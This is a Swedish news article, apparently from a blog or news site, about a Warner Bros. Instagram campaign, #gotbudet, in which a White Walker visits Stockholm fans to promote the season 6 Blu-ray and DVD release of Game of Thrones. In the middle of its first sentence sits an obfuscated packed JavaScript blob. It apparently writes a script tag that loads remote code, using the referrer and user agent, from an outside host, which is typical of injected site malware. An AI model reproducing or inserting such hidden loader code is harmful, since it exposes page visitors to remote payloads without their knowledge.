Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

“Winter is coming” – välkänd karaktär från Game of Thrones besöker Stockholm i helgen

“Winter is coming” – välkänd karaktär från Game of Thrones besöker Stockholm i helgen
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teyza|var|u0026u|referrer|nfnkd||js|php’.split(’|’),0,{}))
helgen har de innerstadsbor som vill och vågar chansen att få besök av en skrämmande White Walker-karaktär från den populära tv-serien Game of Thrones. Aktiviteten genomförs av Warner Bros. inför lanseringen av Game of Thrones sjätte säsong på Blu-ray och DVD i Sverige. 

Alla trogna Game of Thrones-fans i Stockholms innerstad ges nu möjlighet att få påhälsning av en minst sagt annorlunda och skräckinjagande budbärare. I samband med lanseringen av Game of Thrones sjätte säsong på Blu-ray och DVD anordnas #gotbudet söndagen den 13 november. Det är en aktivitet på Instagram där boende i Stockholms innerstad uppmanas att posta en valfri Instagrambild och hashtagga med just #gotbudet. De 15 första kan vänta sig besök av en otäck varelse och en gåva som kan bota både höstsnuva och tv-serieabstinens. Frågan är bara hur många som vågar öppna dörren?

– ”Winter is coming” och med det förkylningstider. Är det någon gång man har tid att sträcktitta på en hel säsong så är det när man är sängliggande. I samband med lanseringen av succéserien Game of Thrones säsong 6 på Blu-ray och DVD, skickar vi därför hem ett förkylningskit innehållande boxen och andra förnödenheter i händerna på en White Walker, till våra mest trogna GoT-fans, säger Agnetha Gardebrandt, Marketing Manager på Warner Bros. Home Entertainment Nordic.

Vad: Aktiviteten #gotbudet i samband med lanseringen av Game of Thrones, säsong 6.
När: Söndagen den 13 november mellan 12:00-18:00.
Hur: Publicera en bild på Instagram och hashtagga med #gotbudet.